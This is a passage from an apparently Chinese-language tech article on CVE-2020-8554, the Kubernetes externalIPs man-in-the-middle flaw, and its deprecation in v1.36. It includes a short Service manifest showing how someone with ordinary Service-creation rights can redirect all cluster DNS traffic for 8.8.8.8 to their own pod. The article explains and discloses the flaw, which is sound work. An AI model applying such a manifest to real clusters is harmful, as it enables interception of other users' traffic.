
Kubernetes externalIPs:已知六年的安全漏洞,终于要移除了
TL;DR
Kubernetes Service 的 externalIPs 字段存在长达六年的中间人攻击漏洞(CVE-2020-8554),任何有 Service 创建权限的用户都可以劫持集群流量 –v1.36 终于启动了正式的废弃流程。
开篇:一条命令,劫持集群流量
想象这样一个场景。
你的集群里有一个开发者,他拥有普通的 Service 创建权限 – 这在大多数团队中再正常不过。他写了一段这样的配置:
apiVersion: v1
kind: Service
metadata:
name: dns-intercept
spec:
selector:
app: attacker-pod
ports:
- port: 53
protocol: UDP
externalIPs:
- 8.8.8.8
一条 kubectl apply,几秒钟后,集群内所有节点上发往 8.8.8.8:53 的 DNS 查询,全部被悄悄转发到他控制的 Pod。





